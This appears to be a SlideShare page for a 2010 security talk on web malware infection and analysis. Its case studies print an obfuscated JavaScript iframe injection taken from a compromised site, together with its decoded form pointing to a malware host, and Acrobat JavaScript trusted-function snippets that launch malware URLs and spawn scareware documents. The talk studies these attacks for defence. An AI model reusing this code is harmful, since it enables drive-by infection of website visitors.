SlideShare ist ein Scribd-Unternehmen logo

Scaling Web 2.0 Malware Infection

Wayne Huang
Wayne Huang

Given at TRISC 2010, Grapevine, Texas. http://www.trisc.org/speakers/aditya_sood/#p The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.

Technologie
1 von 46
Downloaden Sie, um offline zu lesen
Scaling Web 2.0 Malware Infection ______________________________________ Aditya K Sood, Sr. Security Practitioner Armorize , Santa Clara US
Disclaimer All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers.
About Me - $whoami • Senior Security Practitioner , Armorize http://www.armorize.com • Founder , SECNICHE Security. http://www.secniche.org • Worked previously for COSEINC as Senior Security Researcher and Security Consultant for KPMG • Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals. • Like to do Bug Hunting and Malware dissection. • Released Advisories to Forefront Companies. • Active Speaker at Security Conferences including RSA etc.
 Agenda  Understanding The Malware Anatomy  The Vertical Risk – Malware Impact on Business  Top 10+ Web Malware Infection Strategies  2X Generation - Century Malware Trickeries  Case Study – Infection through PDF Trusted Functions  Demonstration
 Pattern Understanding The Malware Anatomy The Dependent Peripherals
 Malware Mess – Global Trifecta
 Malware Infection Rate
 Malware Retrospective and Classification Top 5 Malware Categories Top 5 Virus Families Trojan (31.2 %) Stuh (4.4 %) Downloader (25.6 %) Fraudload (3.9 %) Backdoor (13.8 %) Monder (3.6 %) Spyware (13.2 %) Autorun (2.7 %) Adware (4.9%) Buzus (2.7 %) Interdependency
 Malware - The Impact on Real World
 Malware Trends – The Attack Base  Financial abuse and mass identity theft  The mass destructor – Botnet infection and zombie hosts  Exploiting the link dependency – Pay Per click hijacking  Traffic manipulation – Open redirect vulnerabilities at large scale  Spywares , crypto virology , ransom ware etc  Distributed Denial of Service – The service death game , extortion  Industry change semantics – Malware activation change line  Infection through browsers and portable gadgets – the biggest step  Exploiting anti virus loopholes
 Malware Contributing Issues – Rising Steps  Publicly available malware source code  Malware distribution framework such MPACK , NeoSploit etc.  Unpatched vulnerabilities and loosely coupled patches  Demand of underground services and self exposure  Global surveillance mode and information stealing in the wild  Software discrepancies and inherited design flaws such as Browsers.  Exploitation at web level is easy. It opens a door to System Level Fallacies.  Inappropriate security solutions deployed and irrelevant security paradigm  Botnet Infection – The easy way to launch diversified attack  Web sharing and centralized work functionality.
 Pattern Understanding The Vertical Risk Web Delivered Malware Impact on Business Underground Market and Malware Flow Model
 Underground Malware Market Business - Statistics © GDATA
 Practical Malware Flow Model Malware Writers Role Flow of Malware Websites © Reihe Informatik. TR-2007-011
 Malware - The Impact on Real World
 Pattern Malware – Sources of Infection Web 2.0 Top 10 + Strategies of Distributing Malware through Web
Long Live Drive By Download – Base Web Malware Tactic
(SEO) Poisoning – Driven with Malware
Messengers – Infection at Instant State
 Networking Websites – TWITTER Malware Infection  Exploiting the trust relationship on Social Networking Websites  Spreading malware content through Tweets , Scrapping etc  Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
 Social Networking – FACEBOOK Malware Applications  Manipulating the Open API Calls  User centric control  Exploiting the design fallacies
 Social Networking – FACEBOOK MAIL Infection Step 1 Step 2 Step 3
 Online Media Content – You Tube, Google Videos etc !!
 Exploiting the Web of Trust – Human Touch
 Spywares , Ransom Wares and other Variants etc.
 Insidious Spamming – Email , Blogs , Redirectors etc
Botnets – Malware Infection at Large Scale
 Direct Malware Hosting – Infected Web Domains
 System Stringency – Exploiting the Exceptions
Malware Kits – Automated Infection
 Case Study – Safety Labs Malware Infection Malware Infecting the Security Service Provider Websites. ____________________________________________________________ It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME threats or rather say infections Thousands of websites on internet have been compromised with malicious Iframes which load exploit code designed to silently install trojans onto susceptible victim computers.
 Case Study – Safety Labs Malware Infection
 Case Study – Safety Labs Malware Infection Script Source is OBFUSCATED JAVASCRIPT http://www.safety- lab.com/audits/categorylist.pl?lang=en <SCRIPT LANGUAGE=JAVASCRIPT> FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35, 59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34, 0,58,40,31,60 ,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J-- ){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W |=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S- =2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9 QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML E0DMXICGRAD F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5 Y7@HD')</SCRIPT><!-- 213.219.250.100 -->
 Case Study – Safety Labs Malware Infection Complexity factor is always high in decoding DEOBFUSCATED JAVASCRIPT the malicious JavaScript. (1) DECODED JAVASCRIPT EVALS() WINDOW.STATUS = 'DONE'; DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() * 14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>') (2) DECODED JAVASCRIPT WRITES RESULT <IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"> </IFRAME> HTTP://3PIGS.INFO/T/?58965B8F “ was injected as source for malicious file .
 2X Generation Malware Trickeries  System File Patching and Code Injection  Code Interdependency – Malware Adjacency - Code Resuscitation.  Code Randomization, Obfuscation and Morphing  Rootkits and System Cloaking  Exploiting Active X and JavaScript Heaps – Direct Control
 Escaping What ! Private & Confidential Property of Armorize
 Malware Analysis Methodology (MAM) - Overview End Point Communication  Connection state check  Server identity checks through communication medium.  Error generation like Checksum Integrity.  Encrypted data in packets.  Protocol Switching. Session Stream Analysis – Deep Inspection Analyzing TCP stream session  Extracting an executable from the raw data Behavioral Analysis – Scrutinizing system fallacies  Active debugging  Black Box Testing approach Static Analysis – Reversing the facets of malware Its all about analyzing the code of Malware
 Case Study – Malware Infection PDF Trusted Functions (Understanding the Facets of Malware)
 Some PDF Truths  Hyperlink execution notification as alerts  Data is not allowed to be stored in the forms http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf  Number of vulnerable functions have been removed i.e. from registered state  Support for Adobe reader 7.xx has been removed http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html  Other alerts have been structured as security checks in standalone PDF’s  ACRO JS does not support DOM as normal JavaScript does. Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in specific environments. For example:- In general, it is not possible to generate another PDF from the standalone PDF when it is opened
 Understanding Malware Infection - PDF  Exploiting the browser – Downloading files through Windows Media Player  Exploiting the Global Access of JavaScript folder in PDF Hidden gift.js file containing malicious code is placed here
 Understanding Malware Infection - PDF  Calling Codes through Trusted Functions  Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end privileges) to enclose any type of function and code to be trusted.  The trusted functions method can be called successfully on the initialization of the application and it is possible to call certain number of restricted functions through it. myTrustedFunction = app.trustedFunction( function() { <function body> } ); New Scareware Message – Opening a new PDF trustedDoc = app.trustedFunction( function (width,height) { app.beginPriv(); var trustDoc = app.newDoc(width,height); trustDoc.addWatermarkFromText("X JERKED X"); app.endPriv(); return trustDoc; }) trustedDoc(300,300);
 Understanding Malware Infection - PDF  Calling Codes through Trusted Propagator Functions myPropagatorFunction = app.trustPropagatorFunction( function() { <function body> } URL Opening - Drive by Download Infections trustedDoc = app.trustedFunction ( function (cURL, bNewFrame) { app.beginPriv(); var trustedDoc = app.launchURL(cURL, bNewFrame); app.endPriv(); return trustedDoc; } ) trustedDoc("http://www.malware1.com",true); trustedDoc("http://www.malware2.com",true); trustedDoc("http://www.malware3.com",true); trustedDoc("http://www.malware4.com",true); trustedDoc("http://www.malware5.com",true);
 Understanding Malware Infection - PDF
 Demonstration
 Questions and Queries
 Thanks and Regards Special thanks to Armorize for pushing me to do more research. http://www.armorize.com __________________________________________________________________________________ Portal and Blog SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com (Screenshots shared from various resources)

Empfohlen

ISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelAditya K Sood
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 nat page
 
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupWHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupSymantec
 
Wannacry Virus
Wannacry VirusWannacry Virus
Wannacry VirusEast West University
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Methods Hackers Use
Methods Hackers UseMethods Hackers Use
Methods Hackers Usebrittanyjespersen
 
Mobile Malware
Mobile MalwareMobile Malware
Mobile MalwareMartin Holovský
 

Empfohlen

ISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelAditya K Sood
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 nat page
 
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupWHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupSymantec
 
Wannacry Virus
Wannacry VirusWannacry Virus
Wannacry VirusEast West University
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Methods Hackers Use
Methods Hackers UseMethods Hackers Use
Methods Hackers Usebrittanyjespersen
 
Mobile Malware
Mobile MalwareMobile Malware
Mobile MalwareMartin Holovský
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebZero Science Lab
 
The malware (r)evolution
The malware (r)evolutionThe malware (r)evolution
The malware (r)evolutionITrust - Cybersecurity as a Service
 
Flashpoint ransomware april2016
Flashpoint ransomware april2016Flashpoint ransomware april2016
Flashpoint ransomware april2016Andrey Apuhtin
 
Anatomy of a cyber-attack
Anatomy of a cyber-attackAnatomy of a cyber-attack
Anatomy of a cyber-attackIcomm Technologies
 
Threat modeling driven security testing
Threat modeling driven security testingThreat modeling driven security testing
Threat modeling driven security testingPaúl Sn
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012DefCamp
 
Software Security - Vulnerability&Attack
Software Security - Vulnerability&AttackSoftware Security - Vulnerability&Attack
Software Security - Vulnerability&AttackEmanuela Boroș
 
Malware by Ms. Allwood
Malware by Ms. AllwoodMalware by Ms. Allwood
Malware by Ms. AllwoodStavia
 
Watering hole attacks detect the undetectable
Watering hole attacks detect the undetectableWatering hole attacks detect the undetectable
Watering hole attacks detect the undetectablePaladionNetworks01
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaperDaniel Tumser
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...IRJET Journal
 
Viruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise NetworksViruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise NetworksDiane M. Metcalf
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super BaitJeremiah Grossman
 
WannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of RansomwarWannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of RansomwarDavid Smith
 
Lab 1 4-5
Lab 1 4-5Lab 1 4-5
Lab 1 4-5Ratzman III
 
Computer virus
Computer virusComputer virus
Computer virusomroyal
 
Senior seminar virus
Senior seminar virusSenior seminar virus
Senior seminar virusHimanshu Mahar
 
Cyber Attacks
Cyber AttacksCyber Attacks
Cyber AttacksInsiya Tarwala
 
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...Wayne Huang
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?Wayne Huang
 

Weitere ähnliche Inhalte

Was ist angesagt?

Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebZero Science Lab
 
Flashpoint ransomware april2016
Flashpoint ransomware april2016Flashpoint ransomware april2016
Flashpoint ransomware april2016Andrey Apuhtin
 
Threat modeling driven security testing
Threat modeling driven security testingThreat modeling driven security testing
Threat modeling driven security testingPaúl Sn
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012DefCamp
 
Software Security - Vulnerability&Attack
Software Security - Vulnerability&AttackSoftware Security - Vulnerability&Attack
Software Security - Vulnerability&AttackEmanuela Boroș
 
Malware by Ms. Allwood
Malware by Ms. AllwoodMalware by Ms. Allwood
Malware by Ms. AllwoodStavia
 
Watering hole attacks detect the undetectable
Watering hole attacks detect the undetectableWatering hole attacks detect the undetectable
Watering hole attacks detect the undetectablePaladionNetworks01
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaperDaniel Tumser
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...IRJET Journal
 
Viruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise NetworksViruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise NetworksDiane M. Metcalf
 
WannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of RansomwarWannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of RansomwarDavid Smith
 
Computer virus
Computer virusComputer virus
Computer virusomroyal
 

Was ist angesagt? (19)

Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
 
The malware (r)evolution
The malware (r)evolutionThe malware (r)evolution
The malware (r)evolution
 
Flashpoint ransomware april2016
Flashpoint ransomware april2016Flashpoint ransomware april2016
Flashpoint ransomware april2016
 
Anatomy of a cyber-attack
Anatomy of a cyber-attackAnatomy of a cyber-attack
Anatomy of a cyber-attack
 
Threat modeling driven security testing
Threat modeling driven security testingThreat modeling driven security testing
Threat modeling driven security testing
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
 
Software Security - Vulnerability&Attack
Software Security - Vulnerability&AttackSoftware Security - Vulnerability&Attack
Software Security - Vulnerability&Attack
 
Malware by Ms. Allwood
Malware by Ms. AllwoodMalware by Ms. Allwood
Malware by Ms. Allwood
 
Watering hole attacks detect the undetectable
Watering hole attacks detect the undetectableWatering hole attacks detect the undetectable
Watering hole attacks detect the undetectable
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
 
Viruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise NetworksViruses & Malware: Effects On Enterprise Networks
Viruses & Malware: Effects On Enterprise Networks
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
WannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of RansomwarWannaCry: Autopsy of Ransomwar
WannaCry: Autopsy of Ransomwar
 
Lab 1 4-5
Lab 1 4-5Lab 1 4-5
Lab 1 4-5
 
Computer virus
Computer virusComputer virus
Computer virus
 
Senior seminar virus
Senior seminar virusSenior seminar virus
Senior seminar virus
 
Cyber Attacks
Cyber AttacksCyber Attacks
Cyber Attacks
 

Andere mochten auch

0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...Wayne Huang
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?Wayne Huang
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
 
Malware classification
Malware classificationMalware classification
Malware classificationzynamics GmbH
 
Dr StrangeLove: How I learned to stop worrying and love appraisals
Dr StrangeLove: How I learned to stop worrying and love appraisalsDr StrangeLove: How I learned to stop worrying and love appraisals
Dr StrangeLove: How I learned to stop worrying and love appraisalsDragonLight Films
 
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case Studies
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case StudiesRSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case Studies
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case StudiesWayne Huang
 

Andere mochten auch (7)

0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
 
Malware classification
Malware classificationMalware classification
Malware classification
 
Dr StrangeLove: How I learned to stop worrying and love appraisals
Dr StrangeLove: How I learned to stop worrying and love appraisalsDr StrangeLove: How I learned to stop worrying and love appraisals
Dr StrangeLove: How I learned to stop worrying and love appraisals
 
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case Studies
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case StudiesRSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case Studies
RSA 2015 Bitcoin's Future Threats: Expert's Roundtable based on 150 Case Studies
 

Ähnlich wie Scaling Web 2.0 Malware Infection

Common Malware Types Vulnerability Management
Common Malware Types Vulnerability ManagementCommon Malware Types Vulnerability Management
Common Malware Types Vulnerability ManagementMuhammad FAHAD
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert TrendSC Leung
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threatsMartin Holovský
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious CodeSatria Ady Pradana
 
Ceh certified ethical hacker
Ceh certified ethical hackerCeh certified ethical hacker
Ceh certified ethical hackerbestip
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpJoann Davis
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Volume And Vectors 090416
Volume And Vectors 090416Volume And Vectors 090416
Volume And Vectors 090416Anthony Arrott
 
Mod2 wfbs new starter
Mod2 wfbs new starterMod2 wfbs new starter
Mod2 wfbs new starterIan Thiele
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to RespondThomas Roccia
 
Comparative Study of Fileless Ransomware
Comparative Study of Fileless RansomwareComparative Study of Fileless Ransomware
Comparative Study of Fileless Ransomwareijtsrd
 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Satria Ady Pradana
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptschwarz10
 
The Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day RealityThe Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day RealityLumension
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Realityamiable_indian
 
Battling Malware In The Enterprise
Battling Malware In The EnterpriseBattling Malware In The Enterprise
Battling Malware In The EnterpriseAyed Al Qartah
 
Secure by design and secure software development
Secure by design and secure software developmentSecure by design and secure software development
Secure by design and secure software developmentBill Ross
 

Ähnlich wie Scaling Web 2.0 Malware Infection (20)

Common Malware Types Vulnerability Management
Common Malware Types Vulnerability ManagementCommon Malware Types Vulnerability Management
Common Malware Types Vulnerability Management
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert Trend
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threats
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
 
Ceh certified ethical hacker
Ceh certified ethical hackerCeh certified ethical hacker
Ceh certified ethical hacker
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Volume And Vectors 090416
Volume And Vectors 090416Volume And Vectors 090416
Volume And Vectors 090416
 
Mod2 wfbs new starter
Mod2 wfbs new starterMod2 wfbs new starter
Mod2 wfbs new starter
 
NetWitness
NetWitnessNetWitness
NetWitness
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond
 
How websites are attacked
How websites are attackedHow websites are attacked
How websites are attacked
 
Comparative Study of Fileless Ransomware
Comparative Study of Fileless RansomwareComparative Study of Fileless Ransomware
Comparative Study of Fileless Ransomware
 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Malware Infections
Malware InfectionsMalware Infections
Malware Infections
 
The Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day RealityThe Role of Application Control in a Zero-Day Reality
The Role of Application Control in a Zero-Day Reality
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
 
Battling Malware In The Enterprise
Battling Malware In The EnterpriseBattling Malware In The Enterprise
Battling Malware In The Enterprise
 
Secure by design and secure software development
Secure by design and secure software developmentSecure by design and secure software development
Secure by design and secure software development
 

Kürzlich hochgeladen

Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Human Factors of XR: Using Human Factors to Design XR Systems
